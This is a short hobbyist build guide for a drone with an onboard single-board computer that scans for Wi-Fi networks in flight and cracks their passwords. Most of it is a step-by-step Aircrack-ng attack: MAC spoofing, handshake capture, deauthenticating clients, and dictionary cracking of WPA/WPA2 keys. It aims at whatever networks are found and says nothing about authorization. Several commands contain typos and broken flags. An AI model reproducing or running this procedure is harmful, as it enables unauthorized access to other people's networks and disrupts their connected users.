Wi-Fi Hacking Drone: Is a drone with a SBC (UDOO) on board. When flying, it scans Wi-Fi signal and try to hack the password of the router found, otherwise, if it's impossible to hack, the UDOO save only the packet that contains the handshake to allow to finish work on the ground.
2. Needed parts- UDOO Quad
- Wi-Fi adapter (Ubuntu Compatible)
- Aircrack-ng
3.1 Aircrack-ng Installation
For using Aircrack-ng on Linux distribution, we have to install it. Usually it is available on any packet manager but in our project we have to install the version for ARM processor that isn't available on packet manager.
To install it follow this lines:
wget http://download.aircrack-ng.org/aircrack-ng-1.2-beta1.tar.gz
tar -zxvf aircrack-ng-1.2-beta1.tar.gz
cd aircrack-ng-1.2-beta1
make
make install
3.2 How to utilize Aircrack-ng
In this part I want to describe how to utilize Aircrack to collect the handshake and crack the Wi-Fi. So now you can mount your UDOO into your drone and connect it to your via SSH and the secondary Wi-Fi adapter.
airmon-ng start wlan0
This command will enable the virtual interface wlan0
, you need to configure the card in monitor mode, i.e., mon0.
ifconfig mon0 down
Now we can turn off the interface mon0
to change later MAC address.
maccchanger –m 00:11:22:33:44:55 mon0
Through this command MAC address of our platform UDOO we will be changed at our discretion.
ifconfig mon0 up
With the above command is detected mon0
interface with the new MAC.
airodump-ng mon0
We can then look for Wi-Fi signals in the vicinity.
airodump-ng –ignore-negative-one –c -6 –bssid xx:xx:xx:xx:xx:xx –w nomefile mon0
Once you choose the Wi-Fi to Hacking, ignore the negative channels and depending on channel served by the Wi-Fi choose the channel number (in this case 6), we put the bssid
the network that will associate a file that will serve later for the handshake, and finally we give the interface to which to refer.
aireplay-ng –ignore-negative-one -0 1 –a xx:xx:xx:xx:xx:xx –c 00:11:22:33:44:55
This step sends a message to the wireless client saying that is no longer associated with the network. The wireless client will then re-authenticate again with the network. The re-authentication is what generates the authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.
aircrack-ng –w nomefilepassword –b xx:xx:xx:xx:xx:xx nomefile.cap
The purpose of this phase is to actually break the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, Aircrack-ng takes each word to see if this is actually the pre-shared key.
Comments